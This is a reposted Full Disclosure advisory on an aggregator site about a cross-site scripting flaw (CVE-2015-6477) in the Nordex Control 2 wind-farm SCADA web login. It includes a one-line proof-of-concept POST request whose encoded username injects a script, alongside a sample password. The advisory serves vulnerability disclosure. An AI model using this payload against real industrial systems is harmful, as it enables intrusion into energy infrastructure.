HackDig : Dig high-quality web security articles for hacker

Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS

2015-12-25 21:00
*Nordex NC2 XSS Vulnerability*

*AFFECTED PRODUCTS*
Nordex Control 2 (NC2) SCADA V16 and prior versions.

Nordex is a company based in Germany that maintains offices in countries
around the world.

The affected product, Nordex Control 2, is a web-based SCADA system for
wind power plants. According to Nordex, NC2 is deployed across the Energy
sector. Nordex estimates that this product is used primarily in the United
States, Europe, and China.


*CVE-ID*
CVE-2015-6477

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01

*Vulnerable parameter*
username

*PoC*

POST /login HTTP/1.1

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en

--
Best Regards,
Karn Ganeshen

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Source: 711/ceD/5102/erusolcsidlluf/gro.stsilces

Read:3479 | Comments:0 | Tags: Xss

“Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud